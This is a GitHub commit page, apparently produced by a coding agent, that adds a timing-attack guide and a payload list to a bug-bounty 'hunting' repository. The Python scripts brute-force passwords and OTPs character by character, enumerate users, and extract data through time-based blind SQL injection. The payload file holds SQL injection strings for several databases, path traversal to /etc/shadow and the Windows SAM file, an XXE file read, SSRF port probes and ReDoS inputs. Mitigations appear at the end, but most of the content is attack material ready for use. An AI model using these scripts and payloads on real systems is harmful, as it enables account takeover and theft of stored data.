0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add timing attacks, Tor-based attacks, SSJI, symbolic link attacks, and enhanced auth bypass payloads

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 15:54:35 +00:00
parent 5c4486169d
commit 1677a567e7
10 changed files with 4302 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Timing-Attacks/README.md
+596
View File
@@ -0,0 +1,596 @@
# Timing Attacks
## Description
Timing attacks are a type of side-channel attack where an attacker can discover information by analyzing the time it takes for a system to respond to different inputs. These attacks exploit variations in processing time to infer sensitive data such as valid usernames, password correctness, cryptographic keys, or internal system states.
## How Timing Attacks Work
When an application takes different amounts of time to process valid versus invalid inputs, attackers can measure these timing differences to gain information. For example:
- Valid username checks may take longer due to additional database queries
- Password verification may fail faster for wrong usernames than wrong passwords
- Token validation may reveal valid token formats through timing differences
- Cryptographic operations may leak information through processing time
## Common Vulnerabilities
### 1. **User Enumeration via Login Timing**
Login responses take different times for existing vs non-existing users.
### 2. **Password Verification Timing**
Password comparison stops at first wrong character (early return).
### 3. **Token Validation Timing**
Valid token format takes longer to process than invalid format.
### 4. **Cryptographic Key Discovery**
RSA, AES operations leak information through execution time.
### 5. **Database Query Timing**
Different query execution times reveal data existence.
### 6. **Cache Timing**
Cached vs uncached responses have different timing signatures.
### 7. **Session Validation Timing**
Valid session checks take longer than invalid session checks.
### 8. **OTP/PIN Verification Timing**
Character-by-character comparison reveals partial correctness.
## Common Attack Vectors
- Authentication endpoints (login, password reset)
- Token validation endpoints
- Search functionality
- Database queries
- Cryptographic operations
- Session management
- File existence checks
- Cache mechanisms
## Testing Methodology & PoC Examples
### PoC 1: User Enumeration via Login Timing
**Vulnerability:** Different response times for existing vs non-existing users.
**Steps to Test:**
1. Send login request with known existing username
2. Measure response time (e.g., 250ms)
3. Send login request with non-existing username
4. Measure response time (e.g., 50ms)
5. Significant difference indicates vulnerability
**Python Script:**
```python
import requests
import time
def measure_login_time(username, password):
start = time.time()
response = requests.post('https://example.com/login',
data={'username': username, 'password': password})
end = time.time()
return end - start
# Test with known existing user
existing_user_time = measure_login_time('admin', 'wrong_password')
print(f"Existing user time: {existing_user_time:.3f}s")
# Test with non-existing user
nonexistent_user_time = measure_login_time('nonexistent_user_12345', 'wrong_password')
print(f"Non-existing user time: {nonexistent_user_time:.3f}s")
# If difference is significant (>50ms), vulnerability exists
if abs(existing_user_time - nonexistent_user_time) > 0.05:
print("Timing attack vulnerability detected!")
```
**Request Example:**
```http
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
username=admin&password=test123
```
**Mitigation:** Use constant-time comparison and always perform same operations regardless of user existence.
---
### PoC 2: Password Length Discovery via Timing
**Vulnerability:** Password verification time increases with correct prefix length.
**Steps to Test:**
1. Try passwords of different lengths
2. Measure response time for each
3. Longer correct prefixes take more time
4. Incrementally discover password character by character
**Python Script:**
```python
import requests
import time
import string
def test_password_timing(username, password):
times = []
for _ in range(10): # Multiple attempts for accuracy
start = time.time()
requests.post('https://example.com/login',
data={'username': username, 'password': password})
end = time.time()
times.append(end - start)
return sum(times) / len(times) # Average time
# Brute force password character by character
known_password = ""
for position in range(20): # Try up to 20 characters
best_char = None
longest_time = 0
for char in string.ascii_letters + string.digits:
test_password = known_password + char
avg_time = test_password_timing('admin', test_password)
if avg_time > longest_time:
longest_time = avg_time
best_char = char
if best_char:
known_password += best_char
print(f"Discovered: {known_password}")
else:
break
```
---
### PoC 3: Token Validation Timing Attack
**Vulnerability:** Valid token format takes longer to validate.
**Steps to Test:**
1. Send requests with various token formats
2. Measure validation time
3. Valid format (even if expired) takes longer
4. Use timing to discover valid token structure
**Request Examples:**
```http
GET /api/validate?token=invalid_format HTTP/1.1
Host: example.com
# Fast response (5ms)
GET /api/validate?token=550e8400-e29b-41d4-a716-446655440000 HTTP/1.1
Host: example.com
# Slower response (50ms) - valid UUID format
```
**Python Script:**
```python
import requests
import time
tokens = [
'invalid',
'12345',
'abc-def-ghi',
'550e8400-e29b-41d4-a716-446655440000', # Valid UUID
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...', # Valid JWT format
]
for token in tokens:
start = time.time()
response = requests.get(f'https://example.com/api/validate?token={token}')
elapsed = time.time() - start
print(f"Token: {token[:20]}... Time: {elapsed:.4f}s")
```
---
### PoC 4: Database Query Timing (SQL Timing Attack)
**Vulnerability:** Different query execution times reveal data.
**Steps to Test:**
1. Inject time-based SQL payloads
2. Measure response time
3. If condition is true, response is delayed
4. Extract data bit by bit
**SQL Timing Payloads:**
```sql
' OR IF(1=1, SLEEP(5), 0) --
' OR IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
' AND IF((SELECT COUNT(*) FROM users)>10, SLEEP(5), 0) --
admin' AND IF(LENGTH(password)>8, BENCHMARK(5000000,SHA1('test')), 0) --
```
**Request:**
```http
POST /search HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
query=' OR IF(1=1, SLEEP(5), 0) --
```
**Python Script:**
```python
import requests
import time
def check_condition(condition):
payload = f"' OR IF({condition}, SLEEP(5), 0) --"
start = time.time()
requests.post('https://example.com/search', data={'query': payload})
elapsed = time.time() - start
return elapsed > 5 # True if condition is true
# Extract database name length
for length in range(1, 50):
if check_condition(f"LENGTH(DATABASE())={length}"):
print(f"Database name length: {length}")
break
```
---
### PoC 5: Cache Timing Attack
**Vulnerability:** Cached responses are faster than uncached.
**Steps to Test:**
1. Request resource multiple times
2. First request is slow (cache miss)
3. Subsequent requests are fast (cache hit)
4. Use timing to discover accessed resources
**Python Script:**
```python
import requests
import time
def check_cache_timing(url):
# First request - potential cache miss
start = time.time()
requests.get(url)
first_time = time.time() - start
# Second request - potential cache hit
start = time.time()
requests.get(url)
second_time = time.time() - start
print(f"URL: {url}")
print(f"First: {first_time:.4f}s, Second: {second_time:.4f}s")
if second_time < first_time * 0.5:
print("Likely cached!")
return True
return False
# Test various resources
resources = [
'https://example.com/api/user/1',
'https://example.com/api/user/2',
'https://example.com/api/user/999',
]
for resource in resources:
check_cache_timing(resource)
```
---
### PoC 6: OTP/PIN Brute Force via Timing
**Vulnerability:** Character-by-character OTP comparison.
**Steps to Test:**
1. Try OTPs with different first digits
2. Correct first digit takes slightly longer
3. Repeat for each position
4. Discover OTP digit by digit
**Python Script:**
```python
import requests
import time
def test_otp_timing(otp):
times = []
for _ in range(20): # Multiple measurements
start = time.time()
requests.post('https://example.com/verify-otp',
data={'otp': otp})
times.append(time.time() - start)
return sum(times) / len(times)
# Discover 6-digit OTP
discovered_otp = ""
for position in range(6):
best_digit = None
longest_time = 0
for digit in range(10):
test_otp = discovered_otp + str(digit) + "0" * (5 - position)
avg_time = test_otp_timing(test_otp)
if avg_time > longest_time:
longest_time = avg_time
best_digit = digit
discovered_otp += str(best_digit)
print(f"Discovered so far: {discovered_otp}")
```
---
### PoC 7: File Existence Check via Timing
**Vulnerability:** File existence affects response time.
**Steps to Test:**
1. Request files that may exist
2. Existing files take longer (file I/O)
3. Non-existing files fail fast
4. Enumerate file structure via timing
**Request:**
```http
GET /download?file=../../../etc/passwd HTTP/1.1
Host: example.com
# Slower if file exists and is accessed
```
---
### PoC 8: Session Validation Timing
**Vulnerability:** Valid sessions require more checks.
**Steps to Test:**
1. Send requests with various session IDs
2. Valid format sessions take longer to invalidate
3. Discover valid session ID patterns
**Python Script:**
```python
import requests
import time
import uuid
def check_session_timing(session_id):
start = time.time()
requests.get('https://example.com/api/data',
cookies={'SESSIONID': session_id})
return time.time() - start
# Test different session formats
session_times = {}
for _ in range(10):
# Random UUID
session_id = str(uuid.uuid4())
timing = check_session_timing(session_id)
session_times[session_id] = timing
print(f"Session: {session_id} Time: {timing:.4f}s")
# Sessions with longer times might have valid format
sorted_sessions = sorted(session_times.items(), key=lambda x: x[1], reverse=True)
print("\nSlowest (potentially valid format):")
for session, timing in sorted_sessions[:3]:
print(f"{session}: {timing:.4f}s")
```
---
### PoC 9: Cryptographic Timing Attack (RSA)
**Vulnerability:** RSA decryption time leaks private key information.
**Concept:**
- RSA operations time varies based on key bits
- Measure time for different ciphertext
- Statistical analysis reveals key bits
**Note:** This requires many measurements and statistical analysis. Real-world example: Bleichenbacher's attack.
---
### PoC 10: Rate Limiting Detection via Timing
**Vulnerability:** Rate limiting adds delay to responses.
**Steps to Test:**
1. Send requests rapidly
2. Measure response times
3. After threshold, responses become slower
4. Discover rate limit threshold
**Python Script:**
```python
import requests
import time
url = 'https://example.com/api/endpoint'
times = []
for i in range(100):
start = time.time()
response = requests.get(url)
elapsed = time.time() - start
times.append(elapsed)
print(f"Request {i+1}: {elapsed:.4f}s")
# Detect sudden increase in response time
if len(times) > 10:
avg_recent = sum(times[-10:]) / 10
avg_early = sum(times[:10]) / 10
if avg_recent > avg_early * 2:
print(f"Rate limit detected around request {i+1}")
break
```
---
## Tools for Testing
### 1. **Custom Python Scripts**
```python
import statistics
import requests
import time
def statistical_timing_attack(url, payloads):
results = {}
for payload in payloads:
times = []
for _ in range(50): # 50 measurements for accuracy
start = time.time()
requests.post(url, data={'input': payload})
times.append(time.time() - start)
# Calculate statistics
avg = statistics.mean(times)
stdev = statistics.stdev(times)
results[payload] = {'avg': avg, 'stdev': stdev}
return results
```
### 2. **Burp Suite Intruder**
- Use "Pitchfork" attack type
- Add "Response received" column
- Sort by response time
- Look for patterns
### 3. **Timing Attack Tools**
```bash
# Using cURL with timing
for i in {1..100}; do
curl -w "Time: %{time_total}s\n" -o /dev/null -s \
"https://example.com/api/check?username=user$i"
done
# Using Apache Bench
ab -n 1000 -c 10 https://example.com/login
# Using wrk for timing analysis
wrk -t12 -c400 -d30s https://example.com/api
```
### 4. **Statistical Analysis Tools**
```python
import numpy as np
import matplotlib.pyplot as plt
# Analyze timing data
times_existing_users = [0.245, 0.248, 0.251, 0.247, 0.249]
times_nonexistent_users = [0.048, 0.051, 0.049, 0.050, 0.047]
print(f"Existing users avg: {np.mean(times_existing_users):.4f}s")
print(f"Non-existing users avg: {np.mean(times_nonexistent_users):.4f}s")
# Plot histogram
plt.hist(times_existing_users, alpha=0.5, label='Existing')
plt.hist(times_nonexistent_users, alpha=0.5, label='Non-existing')
plt.legend()
plt.xlabel('Response Time (s)')
plt.ylabel('Frequency')
plt.title('Timing Attack - User Enumeration')
plt.show()
```
## Exploitation Impact
- **Critical:** Password/key extraction, cryptographic attacks
- **High:** User enumeration, session discovery, data extraction
- **Medium:** Information disclosure, system behavior mapping
- **Privacy Impact:** Reveals user existence, activity patterns
## Remediation
### 1. **Constant-Time Operations**
```python
# Bad - Early return
def check_password(input_password, stored_password):
if len(input_password) != len(stored_password):
return False
for i in range(len(input_password)):
if input_password[i] != stored_password[i]:
return False # Early return leaks information
return True
# Good - Constant-time comparison
import hmac
def check_password_secure(input_password, stored_password):
return hmac.compare_digest(input_password.encode(), stored_password.encode())
```
### 2. **Normalize Response Times**
```python
import time
import random
def login(username, password):
start_time = time.time()
# Perform authentication
result = authenticate(username, password)
# Add random delay to normalize timing
elapsed = time.time() - start_time
target_time = 0.5 # Fixed response time
if elapsed < target_time:
time.sleep(target_time - elapsed + random.uniform(0, 0.05))
return result
```
### 3. **Rate Limiting**
- Implement aggressive rate limiting on sensitive endpoints
- Use exponential backoff
- CAPTCHA after multiple attempts
### 4. **Identical Code Paths**
- Execute same operations for valid and invalid inputs
- Always query database even if username doesn't exist
- Always perform password hash comparison
### 5. **Timing Jitter**
```python
import random
import time
def add_timing_jitter():
time.sleep(random.uniform(0.01, 0.05))
```
### 6. **Blinding Techniques**
- Use blinding in cryptographic operations
- Add random delays
- Use secure libraries (e.g., libsodium)
### 7. **Monitoring and Detection**
- Monitor for unusual timing patterns
- Detect rapid sequential requests
- Alert on systematic timing probes
### 8. **Use Secure Libraries**
- Use constant-time comparison functions
- Use timing-safe cryptographic libraries
- Follow OWASP guidelines
## References
- [OWASP - Timing Attacks](https://owasp.org/www-community/attacks/Timing_attack)
- [NIST - Timing Attacks on Implementations](https://csrc.nist.gov/glossary/term/timing_attack)
- [Remote Timing Attacks are Practical](https://crypto.stanford.edu/~dabo/papers/ssl-timing.pdf)
- [Cache-Timing Attacks on AES](https://cr.yp.to/antiforgery/cachetiming-20050414.pdf)
## Payloads
See `timing-attacks-payloads.txt` for a comprehensive list of timing attack payloads and test cases.
Timing-Attacks/timing-attacks-payloads.txt
+481
View File
@@ -0,0 +1,481 @@
# Timing Attack Payloads
# ============================================
# 1. USER ENUMERATION VIA TIMING
# ============================================
# Test usernames (measure response time differences)
username=admin
username=administrator
username=root
username=test
username=user
username=nonexistent_user_12345
username=aaaaaaaaaaaaaaaaaaaa
# Email enumeration
email=admin@example.com
email=user@example.com
email=nonexistent@example.com
email=invalid@invalid.invalid
# ============================================
# 2. PASSWORD LENGTH DISCOVERY
# ============================================
# Try passwords of increasing length
password=a
password=ab
password=abc
password=abcd
password=abcde
password=abcdef
password=abcdefgh
password=abcdefghij
password=abcdefghijkl
password=abcdefghijklmno
password=abcdefghijklmnopqrst
# ============================================
# 3. SQL TIMING INJECTION PAYLOADS
# ============================================
# Basic sleep-based payloads
' OR SLEEP(5) --
' OR IF(1=1, SLEEP(5), 0) --
' AND SLEEP(5) --
admin' AND SLEEP(5) --
admin' OR SLEEP(5) #
# MySQL time-based blind SQL injection
' OR IF((SELECT COUNT(*) FROM users)>0, SLEEP(5), 0) --
' OR IF(SUBSTRING(DATABASE(),1,1)='a', SLEEP(5), 0) --
' OR IF(LENGTH(DATABASE())>5, SLEEP(5), 0) --
' AND IF((SELECT user FROM mysql.user LIMIT 1)='root', SLEEP(5), 0) --
# PostgreSQL time-based
' OR pg_sleep(5) --
'; SELECT pg_sleep(5) --
' OR (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END) --
# MSSQL time-based
'; WAITFOR DELAY '00:00:05' --
' OR WAITFOR DELAY '00:00:05' --
'; IF (1=1) WAITFOR DELAY '00:00:05' --
' AND (SELECT COUNT(*) FROM users) > 0; WAITFOR DELAY '00:00:05' --
# Oracle time-based
' OR DBMS_LOCK.SLEEP(5) --
' AND DBMS_LOCK.SLEEP(5) --
# SQLite time-based
' OR randomblob(100000000) --
' AND randomblob(100000000) --
# Heavy computation (alternative to SLEEP)
' OR BENCHMARK(5000000, SHA1('test')) --
' AND BENCHMARK(10000000, MD5('test')) --
# Conditional time delays
' OR IF((SELECT COUNT(*) FROM users WHERE username='admin')=1, SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a', SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>96, SLEEP(5), 0) --
# Data exfiltration via timing
' OR IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a', SLEEP(5), 0) --
' OR IF((SELECT SUBSTRING(password,2,1) FROM users WHERE username='admin')='b', SLEEP(5), 0) --
# ============================================
# 4. TOKEN VALIDATION TIMING
# ============================================
# Valid format tokens (will take longer to validate)
token=550e8400-e29b-41d4-a716-446655440000
token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
# Invalid format tokens (will fail fast)
token=invalid
token=12345
token=abc123
token=test
token=null
# ============================================
# 5. OTP/PIN TIMING BRUTE FORCE
# ============================================
# 4-digit PIN testing (measure time for each)
pin=0000
pin=0001
pin=0002
pin=1111
pin=1234
pin=5555
pin=9999
# 6-digit OTP testing
otp=000000
otp=111111
otp=123456
otp=654321
otp=999999
# Character-by-character timing
otp=100000
otp=200000
otp=300000
# If 1xxxxx takes longer, first digit is 1
otp=110000
otp=120000
otp=130000
# Continue for each position
# ============================================
# 6. SESSION VALIDATION TIMING
# ============================================
# Valid UUID format sessions
session_id=550e8400-e29b-41d4-a716-446655440000
session_id=123e4567-e89b-12d3-a456-426614174000
# Invalid format sessions
session_id=invalid
session_id=12345
session_id=test_session
# Sequential session IDs
session_id=1
session_id=2
session_id=100
session_id=1000
# ============================================
# 7. FILE EXISTENCE TIMING
# ============================================
# Common file paths
file=../../../../../../etc/passwd
file=../../../../../../etc/shadow
file=../../../../../../etc/hosts
file=../../../../../../var/log/apache2/access.log
file=../../../config/database.yml
file=../../../.env
file=../../../.git/config
# Windows paths
file=C:\Windows\System32\config\SAM
file=C:\Windows\win.ini
file=C:\boot.ini
# ============================================
# 8. CRYPTOGRAPHIC TIMING ATTACKS
# ============================================
# RSA signature verification timing
signature=<various_signatures>
# Measure verification time to leak key bits
# HMAC timing attacks
hmac=correct_hmac_value
hmac=incorrect_hmac_value
# Non-constant-time comparison leaks information
# Password hash comparison
password_hash=correct_bcrypt_hash
password_hash=incorrect_bcrypt_hash
# ============================================
# 9. CACHE TIMING DETECTION
# ============================================
# Request same resource multiple times
GET /api/user/1
GET /api/user/1
GET /api/user/1
# Second and third should be faster if cached
# Resource enumeration via cache
GET /api/user/1
GET /api/user/2
GET /api/user/3
GET /api/user/100
# Cached resources respond faster
# ============================================
# 10. RACE CONDITION TIMING
# ============================================
# Send simultaneous requests
# POST /transfer amount=1000&from=victim&to=attacker
# (send 10 requests simultaneously)
# Parallel password reset
# POST /forgot-password email=victim@example.com
# (send multiple requests in parallel)
# Concurrent registration
# POST /register username=attacker&email=test@example.com
# (send multiple requests with same email)
# ============================================
# 11. RATE LIMITING DETECTION
# ============================================
# Send rapid requests to detect rate limiting
# Request 1-100 to same endpoint
# Measure time for each
# Detect when responses start taking longer
# ============================================
# 12. DATABASE QUERY TIMING
# ============================================
# Boolean-based timing
query=' OR '1'='1' AND SLEEP(5) --
query=' OR '1'='2' AND SLEEP(5) --
# First one sleeps, second one doesn't
# Conditional queries with timing
search=test' AND (SELECT COUNT(*) FROM users)>0 AND SLEEP(5) --
search=test' AND (SELECT COUNT(*) FROM users)>1000 AND SLEEP(5) --
# ============================================
# 13. AUTHENTICATION ENDPOINT TIMING
# ============================================
# Login timing comparison
username=admin&password=wrongpassword
username=nonexistent&password=wrongpassword
# Measure difference in response time
# 2FA timing
otp=000000
otp=111111
otp=123456
# Measure validation time
# ============================================
# 14. API ENDPOINT TIMING
# ============================================
# Valid vs invalid API keys
Authorization: Bearer valid_format_key_12345678901234567890
Authorization: Bearer invalid
# Valid format takes longer to validate
# Permission check timing
GET /api/admin/users (with admin token)
GET /api/admin/users (with user token)
# Different timing reveals permission check depth
# ============================================
# 15. SEARCH FUNCTIONALITY TIMING
# ============================================
# Search for existing vs non-existing data
search=admin
search=nonexistent_data_12345
# Existing data may take longer to retrieve
# Wildcard search timing
search=a%
search=admin%
search=administrator%
# Results count affects timing
# ============================================
# 16. COMPARISON TIMING ATTACKS
# ============================================
# Secret comparison (character-by-character)
secret=a000000000
secret=b000000000
secret=c000000000
# If 'a' is correct first character, it takes slightly longer
# Token comparison
token=a123456789012345
token=b123456789012345
# Non-constant-time comparison leaks information
# ============================================
# 17. HMAC VERIFICATION TIMING
# ============================================
# Correct HMAC
hmac=2d5f8f5e1c8b9a7f3e4d6c2b1a0f9e8d
# Incorrect HMAC (different lengths)
hmac=incorrect
hmac=1234567890abcdef
hmac=ffffffffffffffffffffffffffffffff
# ============================================
# 18. BACKUP CODE TIMING
# ============================================
# Test backup codes
backup_code=ABCD-EFGH-IJKL-MNOP
backup_code=1234-5678-9012-3456
backup_code=invalid
# ============================================
# 19. EMAIL VALIDATION TIMING
# ============================================
# Existing email addresses
email=admin@example.com
email=user@example.com
# Non-existing email addresses
email=nonexistent@example.com
email=invalid@invalid.com
# ============================================
# 20. PERMISSION CHECK TIMING
# ============================================
# Access with different permission levels
GET /api/resource/1 (as admin)
GET /api/resource/1 (as user)
GET /api/resource/1 (as guest)
# Different permission checks take different times
# ============================================
# 21. REGEX TIMING ATTACKS (ReDoS)
# ============================================
# Exponential backtracking patterns
input=(a+)+b
input=aaaaaaaaaaaaaaaaaaaaaaaa!
input=(a|a)*b
input=(a|ab)*c
# Email validation ReDoS
email=a@a.a....(repeat many times)...@a.a
email=aaaaaaaaaaaaaaaaaaaaaa@aaaaaaaaaa.com
# URL validation ReDoS
url=http://aaaaaaaaaaaaaaaaaaaaa....
# ============================================
# 22. CAPTCHA TIMING
# ============================================
# Correct CAPTCHA response
captcha=correct_answer
# Takes longer to validate
# Incorrect CAPTCHA
captcha=wrong_answer
# Fails fast
# ============================================
# 23. WEBHOOK TIMING
# ============================================
# Valid webhook URLs
webhook_url=https://attacker.com/callback
# Timing reveals if webhook is called
# Invalid webhook URLs
webhook_url=invalid_url
# Fails fast without making request
# ============================================
# 24. FILE UPLOAD TIMING
# ============================================
# Upload allowed file types
file=image.jpg
# Takes time to process
# Upload disallowed file types
file=shell.php
# Fails fast
# ============================================
# 25. API VERSION TIMING
# ============================================
GET /api/v1/users (newer version with more checks)
GET /api/v0/users (older version with fewer checks)
# Different timing reveals version differences
# ============================================
# 26. SUBDOMAIN TIMING
# ============================================
# Check subdomain existence via timing
GET https://admin.example.com
GET https://api.example.com
GET https://internal.example.com
GET https://nonexistent.example.com
# Existing subdomains may respond differently
# ============================================
# 27. HEADER VALIDATION TIMING
# ============================================
# Valid authentication headers
Authorization: Bearer eyJhbGc...
# Takes time to validate JWT
# Invalid headers
Authorization: Bearer invalid
# Fails fast
# ============================================
# 28. CRYPTO OPERATION TIMING
# ============================================
# RSA operations with different keys
public_key=<valid_key>
public_key=<invalid_key>
# Timing leaks key information
# AES operations
plaintext=aaaaaaaa
plaintext=bbbbbbbb
# Timing may leak key bits
# ============================================
# 29. BUSINESS LOGIC TIMING
# ============================================
# Discount code validation
discount_code=VALID2024
discount_code=INVALID
# Valid codes take longer to validate
# Referral code timing
referral=VALID_REFERRAL
referral=INVALID_CODE
# ============================================
# 30. TIME-BASED BLIND ATTACKS
# ============================================
# XML External Entity with timing
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
# Timing reveals if file exists
# SSRF with timing
url=http://localhost:22
url=http://localhost:80
url=http://localhost:3306
# Open ports take longer to timeout
# ============================================
# STATISTICAL TIMING ANALYSIS
# ============================================
# For all above payloads, use statistical methods:
# 1. Send each payload 50-100 times
# 2. Calculate mean and standard deviation
# 3. Compare distributions
# 4. Use t-test or similar to determine significance
# 5. Account for network jitter with multiple measurements